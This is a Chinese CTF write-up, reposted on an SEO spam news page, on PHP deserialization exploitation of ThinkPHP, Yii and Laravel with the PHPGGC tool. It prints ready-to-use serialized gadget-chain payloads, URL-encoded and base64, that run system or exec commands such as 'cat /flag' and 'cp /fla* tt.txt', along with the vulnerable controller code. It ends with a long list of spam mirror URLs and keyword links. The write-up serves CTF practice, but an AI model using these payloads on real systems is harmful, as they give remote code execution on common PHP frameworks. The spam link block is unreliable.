当前位置: 首页 > news >正文 伪原创对网站的影响广州app定制公司 news 2025/11/3 14:39:23 伪原创对网站的影响,广州app定制公司,网站备份 ftp,正规的网站建设工作室前言 php反序列化的框架的利用的pop是非常难写的 并且 我们不知道他的利用方法 所以PHPGGC是一个包含unserialize()有效载荷的库以及一个从命令行或以编程方式生成它们的工具。当在您没有代码的网站上遇到反序列化时#xff0c;或者只是在尝试构建漏洞时#xff0c;此工具…前言 php反序列化的框架的利用的pop是非常难写的 并且 我们不知道他的利用方法 所以PHPGGC是一个包含unserialize()有效载荷的库以及一个从命令行或以编程方式生成它们的工具。当在您没有代码的网站上遇到反序列化时或者只是在尝试构建漏洞时此工具允许您生成有效负载而无需执行查找小工具并将它们组合的繁琐步骤。 它可以看作是frohoff的ysoserial的等价物但是对于PHP。目前该工具支持的小工具链包括CodeIgniter4、Doctrine、Drupal7、Guzzle、Laravel、Magento、Monolog、Phalcon、Podio、ThinkPHP、Slim、SwiftMailer、Symfony、Wordpress、Yii和ZendFramework等。 https://github.com/ambionics/phpggc 使用方法也是非常简单 只需要动动手指 下载解压 拖到kali 之后进入目录 调用 php phpggc -l 查看方法即可 [安洵杯 2019]iamthinking thinkphp框架的反序列化 这个的提示就告诉我们是 个 简单的 thinkphp 框架知道了 就需要进行利用 这种反序列化的题 没有源码是做不了的 所以我们可以先进行网站的目录扫描 或者 是先试一下有没有网站的备份目录 www.zip 拿到 分析源码 拿到版本之后我们就进入他的主页寻找有没有反序列化的点 public function index(){echo img src../test.jpg./;$paylaod $_GET[payload]; // 传入点是 payloadif(isset($paylaod)){$url parse_url($_SERVER[REQUEST_URI]);parse_str($url[query],$query);foreach($query as $value){if(preg_match(/^O/i,$value)){die(STOP HACKING);exit();}}unserialize($paylaod); //这里是个反序列化的利用 }} } 其实到这信息都有了 确认是tp框架造成的 因为框架的语言和原语言的差别还是很大的所以这个pop的构造我们只能使用 TP框架进行构造 还是老老实实当脚本小子 复制编码内容 O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22cpfla%2Axx.txt%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22cpfla%2Axx.txt%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D因为这个匹配不是多次的所以只需要 多加几个 //就行 O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D因为是有回显的所以就生成的时候直接 cat fla* 就行了 Yii框架的反序列化 ctfshow 267 这个有个坑坑就是 他不是直接给你源码的是一个源码泄露的点 但是我们现在不关心这个 我们需要的练习 yii的框架反序列化 view-source:https://4dec4b03-e7e2-4921-8c85-4604d807af6a.challenge.ctf.show/index.php?rsite%2Faboutview-source 一个这个点 是个源码泄露 ctrl u 查看源码 找到 yii 源码 拿到版本 工具找是否有可利用的版本 正好倒数后边两个是可以直接使用的 让工具为我们生成pop 看类型选择 我们选倒数第二个的原因就是 他是命令执行 TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6Njoic3lzdGVtIjt9czozMDoiAHlpaVxjYWNoaW5nXEFycmF5Q2FjaGUAX2NhY2hlIjthOjE6e3M6MToieCI7YToyOntpOjA7czoyOiJscyI7aToxO2k6MDt9fX19fX0 搞了一下发现没有回显 那就生成一个 书写模式的 exec cp /fla* tt.txt 执行这个命令 https://4dec4b03-e7e2-4921-8c85-4604d807af6a.challenge.ctf.show/index.php?rbackdoor/shellcodeTzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6NDoiZXhlYyI7fXM6MzA6IgB5aWlcY2FjaGluZ1xBcnJheUNhY2hlAF9jYWNoZSI7YToxOntzOjE6IngiO2E6Mjp7aTowO3M6MTU6ImNwIC9mbGEqIHR0LnR4dCI7aToxO2k6MDt9fX19fX0 Laravel 框架漏洞 ctfshow 271 关键词触发 laravel 框架并且 有个反序列化 唯一的不足就是 我们不知道 他的版本 那就都试一下 O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A15%3A%22Faker%5CGenerator%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00formatters%22%3Ba%3A1%3A%7Bs%3A8%3A%22dispatch%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A8%3A%22%00%2A%00event%22%3Bs%3A2%3A%22ls%22%3B%7D挨个找找就出 flag 了 应该是在 svg 里 总结 怎么辨别框架 1、最简单的就是 这个识别 2、就是根据源码的提示 除了识别这个之外 还要寻找版本 其次是寻找反序列化函数 文章转载自: http://www.morning.rcjqgy.com.gov.cn.rcjqgy.com http://www.morning.kzbpx.cn.gov.cn.kzbpx.cn http://www.morning.zlgth.cn.gov.cn.zlgth.cn http://www.morning.jqkjr.cn.gov.cn.jqkjr.cn http://www.morning.sqskm.cn.gov.cn.sqskm.cn http://www.morning.hrtwt.cn.gov.cn.hrtwt.cn http://www.morning.rrms.cn.gov.cn.rrms.cn http://www.morning.qwpdl.cn.gov.cn.qwpdl.cn http://www.morning.mxmzl.cn.gov.cn.mxmzl.cn http://www.morning.brwp.cn.gov.cn.brwp.cn http://www.morning.nbmyg.cn.gov.cn.nbmyg.cn http://www.morning.fkwp.cn.gov.cn.fkwp.cn http://www.morning.jtwck.cn.gov.cn.jtwck.cn http://www.morning.qcslh.cn.gov.cn.qcslh.cn http://www.morning.rfmzs.cn.gov.cn.rfmzs.cn http://www.morning.rqjxc.cn.gov.cn.rqjxc.cn http://www.morning.zfyr.cn.gov.cn.zfyr.cn http://www.morning.rksnk.cn.gov.cn.rksnk.cn http://www.morning.dshkp.cn.gov.cn.dshkp.cn http://www.morning.bpmnz.cn.gov.cn.bpmnz.cn http://www.morning.bwqcx.cn.gov.cn.bwqcx.cn http://www.morning.qnhcx.cn.gov.cn.qnhcx.cn http://www.morning.bntfy.cn.gov.cn.bntfy.cn http://www.morning.lkpzx.cn.gov.cn.lkpzx.cn http://www.morning.tyrlk.cn.gov.cn.tyrlk.cn http://www.morning.zqfz.cn.gov.cn.zqfz.cn http://www.morning.nwgkk.cn.gov.cn.nwgkk.cn http://www.morning.wnhsw.cn.gov.cn.wnhsw.cn http://www.morning.fphbz.cn.gov.cn.fphbz.cn http://www.morning.rkdhh.cn.gov.cn.rkdhh.cn http://www.morning.ptzf.cn.gov.cn.ptzf.cn http://www.morning.xbdrc.cn.gov.cn.xbdrc.cn http://www.morning.zgnng.cn.gov.cn.zgnng.cn http://www.morning.fhcwm.cn.gov.cn.fhcwm.cn http://www.morning.ghphp.cn.gov.cn.ghphp.cn http://www.morning.nqlnd.cn.gov.cn.nqlnd.cn http://www.morning.qgjgsds.com.cn.gov.cn.qgjgsds.com.cn http://www.morning.zgztn.cn.gov.cn.zgztn.cn http://www.morning.syznh.cn.gov.cn.syznh.cn http://www.morning.pgfkl.cn.gov.cn.pgfkl.cn http://www.morning.pwmpn.cn.gov.cn.pwmpn.cn http://www.morning.lltdf.cn.gov.cn.lltdf.cn http://www.morning.dkzwx.cn.gov.cn.dkzwx.cn http://www.morning.rkgyx.cn.gov.cn.rkgyx.cn http://www.morning.rrgm.cn.gov.cn.rrgm.cn http://www.morning.mcjyair.com.gov.cn.mcjyair.com http://www.morning.qnywy.cn.gov.cn.qnywy.cn http://www.morning.jfzbk.cn.gov.cn.jfzbk.cn http://www.morning.pwghp.cn.gov.cn.pwghp.cn http://www.morning.ywrt.cn.gov.cn.ywrt.cn http://www.morning.qpqwb.cn.gov.cn.qpqwb.cn http://www.morning.tnzwm.cn.gov.cn.tnzwm.cn http://www.morning.rlwgn.cn.gov.cn.rlwgn.cn http://www.morning.bcngs.cn.gov.cn.bcngs.cn http://www.morning.pdxqk.cn.gov.cn.pdxqk.cn http://www.morning.kqnwy.cn.gov.cn.kqnwy.cn http://www.morning.rlcqx.cn.gov.cn.rlcqx.cn http://www.morning.jfqpc.cn.gov.cn.jfqpc.cn http://www.morning.bntfy.cn.gov.cn.bntfy.cn http://www.morning.mkhwx.cn.gov.cn.mkhwx.cn http://www.morning.fhbhr.cn.gov.cn.fhbhr.cn http://www.morning.jwpcj.cn.gov.cn.jwpcj.cn http://www.morning.dgsx.cn.gov.cn.dgsx.cn http://www.morning.tgyqq.cn.gov.cn.tgyqq.cn http://www.morning.fbxdp.cn.gov.cn.fbxdp.cn http://www.morning.tgtsg.cn.gov.cn.tgtsg.cn http://www.morning.mrfjr.cn.gov.cn.mrfjr.cn http://www.morning.zwsgl.cn.gov.cn.zwsgl.cn http://www.morning.rtlrz.cn.gov.cn.rtlrz.cn http://www.morning.qgmwt.cn.gov.cn.qgmwt.cn http://www.morning.mglqf.cn.gov.cn.mglqf.cn http://www.morning.nlglm.cn.gov.cn.nlglm.cn http://www.morning.nysjb.cn.gov.cn.nysjb.cn http://www.morning.jrpmf.cn.gov.cn.jrpmf.cn http://www.morning.kfcz.cn.gov.cn.kfcz.cn http://www.morning.phwmj.cn.gov.cn.phwmj.cn http://www.morning.srkzd.cn.gov.cn.srkzd.cn http://www.morning.phlwj.cn.gov.cn.phlwj.cn http://www.morning.xkzr.cn.gov.cn.xkzr.cn http://www.morning.fynkt.cn.gov.cn.fynkt.cn 查看全文 http://www.tj-hxxt.cn/news/273974.html 相关文章: 做兼职编辑的网站网站建设基本流程费用 网站建设注意哪些方面比较出名做耐克的网站 网站建设接单企业邮箱是qq邮箱吗 影院网站模板电商代运营公司100强 网站建设自学网找人做网站要多少钱 wordpress调用分类链接南京seo新浪 营销型 展示类网站模板wordpress通栏图片插件 做外贸常用那几个网站中国菲律宾足球历史战绩 电商网站订货网站建设方法叁金手指下拉丶 任何用c语言做网站兰州网站制作公司服务电话 开创云网站建设怎么用动图做网站背景 微信公众好第三方网站怎么做淘宝联盟登记新网站 网站建设公众号小程序开发网站域名解析ip 建设公司网站需要多少天宝丰网站制作公司 谷歌做网站现在建一个网站一年费用只要几百元 摄影作品出售网站wordpress试试手气 商城类网站方案有经验的网站建设 外贸网站建设注意事项网站定制与模板开发 一加官方网站进入视觉设计专业就业前景 成都电子商务网站开发成都网络营销公司哪家好 个人网站介绍足球比赛直播在线观看 网站建设入门培训十大社区团购平台有哪些 做音乐 交流网站网站备案的幕布是什么来的 经营网站备案多语言网站(如何实现网站的多语言版本 ) 0基础学做网站宝安龙华积分商城网站建设 wordpress导航站模版网站与微信对接 高碑店网站建设hexo 导入 wordpress 青岛正规网站设计公司各网站文风 沈阳建站平台网络设计课程设计前言 北京撒网站设计谢岗镇仿做网站
